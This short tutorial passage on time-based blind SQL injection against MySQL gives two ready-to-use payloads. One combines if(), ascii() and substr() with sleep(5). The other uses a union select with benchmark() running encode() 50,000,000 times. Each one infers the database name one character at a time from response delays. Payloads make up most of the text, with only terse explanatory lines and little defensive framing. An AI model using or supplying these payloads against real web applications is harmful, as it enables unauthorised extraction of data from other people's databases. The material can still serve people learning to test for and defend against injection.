1. Use the sleep() function for injection
payload:and if(ascii(substr(database(),1,1))=115,1,sleep(5))%23
2. When there is an error, there will be a time delay of 5 seconds, and use benchmark() to perform delay injection
payload:union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode('MSG','by 5 seconds')),null)),2,3 from (select database() as current) as tb1%23
When the result is correct, run ENCODE('MSG','by 5 seconds') 50000000 times, which will take a while.